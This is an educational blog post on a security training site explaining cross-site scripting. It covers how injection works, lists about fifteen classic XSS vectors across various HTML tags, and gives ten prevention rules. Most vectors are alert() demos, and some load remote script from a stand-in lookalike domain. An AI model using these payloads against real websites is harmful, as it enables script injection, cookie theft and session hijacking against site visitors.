XSS Explained – From Theory to Practice

December 25, 2016 | Views: 3342

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hi there Cybrarians!

As always, I should thank you to all of you for your support. I’m really happy that my articles are helpful to most of you, and now I’m back with another article. Let’s also greet the moderators which are doing a great job with our contents in Cybrary.

I was recently asked to explain how XSS attacks work in depth, and that’s why I want to show you what XSS is, how an attacker might use it, and how a developer can protect an application from such kind of attacks. This article is only for educational purposes and I won’t be responsible for any misuse. I won’t answer on anything that is not in the frame “Ethical and Ethical only”.

 

1. What is XSS Attack?

– Well, XSS stands for Cross-site Scripting (XSS) Attack (the name contains X because X as a symbol looks like a cross) and this kind of attacks are injected only on the client-side (and we will see how this happens).

In other words, this kind of attack refers to a client-side code injection attack where the attacker can execute malicious scripts (commonly called a “payloads”) into a legitimate website or web application.

In this article, I will assume that you have the background knowledge of how Client-Server architectures work in general so we can easily continue on the XSS. In case you don’t remember what am I talking about, let me help you:

One General Web Application consists of the following Elements:

– The Frontend (The looks of a webpage described with HTML, CSS, Javascript etc) – Browser knows how to understand the code and show it like a visual representation.

– The Backend (The logic, the functionalities provided in programming languages like JAVA, C#, PHP etc.)

– The Database (The container of the data that is kept for the application).

 

2.How can attackers make an XSS Attack?

In this scenario, we always need 3 objects: A hosted Website, an Attacker, and the Victim.

As we said earlier, the Attack (the payload) needs to be injected into a legitimate website. What does that mean? It means that the attacker should need to find a way of using an input field to “inject” the script, and the browser then treats it like a code and executes it.The script from the attacker can then be delivered to the visitors and javascript can then change the visual representation, or redirect the user to another link, or it may also collect a data from your browser(usually attacker wants the cookie) which can result in session hijacking etc.

If the Web application is vulnerable to XSS, it will deliver the malicious script to the visitor and then the visitor will be tricked into activating the malicious script. XSS Attacks can be done in VBScript, ActiveX and Flash but they are mostly made in Javascript because Javascript is turned on by default on all browsers.

 

3. List of most used XSS Vectors

<Script> tag:

<script src=http://facebok.com/xss.js></script>

<script> alert(“Boo!”); </script>

<Body> tag:

<body onload=alert(“I’m evil”)>

<body background=”javascript:alert(“So Evil”)”>

<Img> tag:

<img src=”javascript:alert(“Evil”);”>

<img dynsrc=”javascript:alert(‘Bad’)”>

<img lowsrc=”javascript:alert(‘So bad!’)”>

<Iframe> tag:

<iframe src=”http://facebok.com/xss.html”>

<Input> tag:

<input type=”image” src=”javascript:alert(‘Evil work’);”>

<Link> tag:

<link rel=”stylesheet” href=”javascript:alert(‘Evil’);”>

<Table> tag:

<table background=”javascript:alert(‘Evil’)”>

<td background=”javascript:alert(‘So evil’)”>

<Object> tag:

<object type=”text/x-scriptlet” data=”http://facebok.com/xss.html”>

<Div> tag:

<div style=”background-image: url(javascript:alert(‘Evil’))”>

 

These examples are only a few of the most-known, the idea was to show you how the attacker would inject you. As you might see, if there is a field which is vulnerable, the script injected would be parsed as a code that will run locally and it might be used to trick you into clicking it, it can also collect some data and redirect you to get that data.

 

4. How to protect from XSS?

If you want to protect your application from XSS Attacks, please make sure that you follow the following rules:

1.Never Insert Untrusted Data Except in Allowed Locations.

2.HTML Escape Before Inserting Untrusted Data into HTML Element Content

3.Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

4.JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

5.HTML escape JSON values in an HTML context and read the data with JSON.parse

6.URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

7.Sanitize HTML Markup with a Library Designed for the Job

8.Prevent DOM-based XSS

9.Use HTTPOnly cookie flag

10.Use an Auto-Escaping Template System and Implement Content Security Policy

 

Feel free to read on google more about this things. Thank you for reading my article, and feel free to share and support.

 

 

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 331 / December 14, 2019
How do I Get MTA Certified?
Views: 923 / December 12, 2019
How much does your PAM software really cost?
Views: 1376 / December 10, 2019
How Do I Get into Android Development?
Views: 1754 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel